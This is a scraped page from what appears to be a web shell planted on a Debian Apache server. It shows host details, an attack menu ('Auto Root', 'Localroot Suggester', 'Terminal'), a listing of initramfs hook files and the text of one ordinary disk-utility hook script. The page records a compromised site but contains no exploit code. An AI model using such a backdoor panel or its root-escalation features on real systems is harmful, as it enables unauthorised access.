Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
initramfs-tools /
hooks /
Delete
Unzip
Name
Size
Permission
Date
Action
dmsetup
506
B
-rwxr-xr-x
2022-10-19 19:37
expand-root
973
B
-rwxr-xr-x
2020-07-16 17:53
fsck
2.16
KB
-rwxr-xr-x
2025-04-24 15:40
keymap
687
B
-rwxr-xr-x
2020-08-31 23:59
klibc-utils
646
B
-rwxr-xr-x
2021-12-26 17:51
kmod
432
B
-rwxr-xr-x
2022-12-09 22:58
resume
3.14
KB
-rwxr-xr-x
2025-04-24 15:40
thermal
1.29
KB
-rwxr-xr-x
2025-04-24 15:40
udev
1.69
KB
-rwxr-xr-x
2026-04-27 19:48
Save
Rename
#!/bin/sh # Copyright 2018 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. PREREQS="" prereqs() { echo "$PREREQS" } case $1 in prereqs) prereqs exit 0 ;; esac . /usr/share/initramfs-tools/hook-functions copy_exec /sbin/parted /bin copy_exec /bin/grep /bin copy_exec /bin/sed /bin copy_exec /usr/bin/cut /bin copy_exec /sbin/blkid /bin copy_exec /bin/udevadm /bin copy_exec /usr/sbin/dmidecode /bin copy_exec /sbin/sgdisk /bin